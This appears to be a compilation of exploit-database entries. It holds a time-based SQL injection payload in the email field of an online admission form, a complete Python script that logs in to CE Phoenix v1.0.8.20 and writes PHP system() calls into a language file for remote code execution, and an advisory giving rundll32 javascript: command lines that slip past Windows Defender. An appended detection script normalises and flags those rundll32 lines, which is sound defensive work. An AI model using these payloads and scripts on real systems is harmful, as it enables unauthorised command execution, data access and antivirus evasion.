    Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--
---
```

POST Parameter 'email' is vulnerable to SQLi

```
POST /online_admission HTTP/1.1

-----------------------------320375734131102816923531485385
Content-Disposition: form-data; name="email"

*[SQLi]
-----------------------------320375734131102816923531485385
```

[-] Done
-
CE Phoenix v1.0.8.20 - Remote Code Execution
## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)

## EXPLOIT :

```
import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep


class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'


def entry_banner():
    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE,
                    colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE]
    random.shuffle(color_random)
    banner = color_random[0] + """ CE Phoenix v1.0.8.20 - Remote Code Execution \n Author: tmrswrr """
    for char in banner:
        print(char, end='')
        sys.stdout.flush()
        sleep(0.0045)


def get_formid_and_cookies(session, url):
    response = session.get(url, allow_redirects=True)
    if response.ok:
        soup = BeautifulSoup(response.text, 'html.parser')
        formid_input = soup.find('input', {'name': 'formid'})
        if formid_input:
            return formid_input['value'], session.cookies
    return None, None


def perform_exploit(session, url, username, password, command):
    print("\n[+] Attempting to exploit the target...")
    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
    formid, cookies = get_formid_and_cookies(session, initial_url)
    if not formid:
        print("[-] Failed to retrieve initial formid.")
        return

    # Login
    print("[+] Performing login...")
    login_payload = {
        'formid': formid,
        'username': username,
        'password': password
    }
    login_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': initial_url
    }
    login_url = url + "/admin/login.php?action=process"
    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)
    if not login_response.ok:
        print("[-] Login failed.")
        print(login_response.text)
        return
    print("[+] Login successful.")

    new_formid, _ = get_formid_and_cookies(session, login_response.url)
    if not new_formid:
        print("[-] Failed to retrieve new formid after login.")
        return

    # Exploit
    print("[+] Executing the exploit...")
    encoded_command = urllib.parse.quote_plus(command)
    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
    exploit_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': login_response.url
    }
    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)
    if exploit_response.ok:
        print("[+] Exploit executed successfully.")
    else:
        print("[-] Exploit failed.")
        print(exploit_response.text)

    final_response = session.get(url)
    print("\n[+] Executed Command Output:\n")
    print(final_response.text)


def main(base_url, username, password, command):
    print("\n[+] Starting the exploitation process...")
    session = requests.Session()
    perform_exploit(session, base_url, username, password, command)


if __name__ == "__main__":
    entry_banner()
    if len(sys.argv) < 5:
        print("Usage: python script.py [URL] [username] [password] [command]")
        sys.exit(1)
    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]
    main(base_url, username, password, command)
```
-
Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

[Vulnerability Type]
Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G

[CVE Reference]
N/A

[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message.

Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml, but this has since been mitigated. Recently, on Feb 7, 2024, I disclosed that using multiple commas "," will bypass that mitigation, but this has since been fixed again. The fix was short lived, as I found yet another (third) trivial bypass soon after.

[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
Access is denied.

C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')

[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg

[Network Access]
Local

[Severity]
High

[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601

[Disclosure Timeline]
Vendor Notification:
February 16, 2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
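Added defender-side example (not part of the advisory, and not Defender's own logic): the three bypasses described above all pad the same rundll32 command line with traversal hops or commas, so a detection that canonicalises those before matching is not defeated by the next padding variant. The sample command lines are the two quoted in the PoC plus a constructed benign one; the literal signature used for contrast is an assumption.

```python
import re

# Constructed samples: the two rundll32 command lines quoted in the advisory
# (the first is the variant Defender already blocks, the second the new bypass)
# plus one ordinary rundll32 invocation that must not be flagged.
SAMPLES = [
    r'rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)',
    r'''rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')''',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
]

# Hypothetical literal signature of the kind each variant above slips past
# (an assumption used for contrast, not Defender's real rule).
LITERAL_SIGNATURE = r'\..\..\mshtml,RunHTMLApplication'


def literal_match(cmdline):
    """Exact-substring matching: misses both padded variants."""
    return LITERAL_SIGNATURE in cmdline


def normalize_rundll32(cmdline):
    """Canonicalise the padding the bypasses rely on before any matching:
    repeated backslashes, `\\..` traversal hops and comma runs all collapse,
    so the variants reduce to the same shape."""
    s = cmdline.lower()
    s = re.sub(r"\\+", r"\\", s)            # '\\\\' -> '\'
    s = re.sub(r"(\\\.\.)+(?=\\)", "", s)   # drop '\..\..' hops before a path part
    s = re.sub(r",{2,}", ",", s)            # ',,' -> ','
    s = re.sub(r"\s+", " ", s).strip()
    return s


def classify(cmdline):
    """Return the normalised line and the reasons it was flagged, if any.
    Illustrative rule logic (an assumption of this example): rundll32 has no
    legitimate use for the javascript: handler or the mshtml
    RunHTMLApplication export, so either one is enough to alert on."""
    n = normalize_rundll32(cmdline)
    reasons = []
    if n.startswith("rundll32") and "javascript:" in n:
        reasons.append("javascript: handler passed to rundll32")
    if re.search(r"mshtml[^,]*,runhtmlapplication", n):
        reasons.append("mshtml RunHTMLApplication export invoked")
    return {"normalized": n, "flagged": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for line in SAMPLES:
        result = classify(line)
        print(f"literal={literal_match(line)!s:5} normalised={result['flagged']!s:5} "
              f"{result['normalized']}")
        for reason in result["reasons"]:
            print("    -", reason)
```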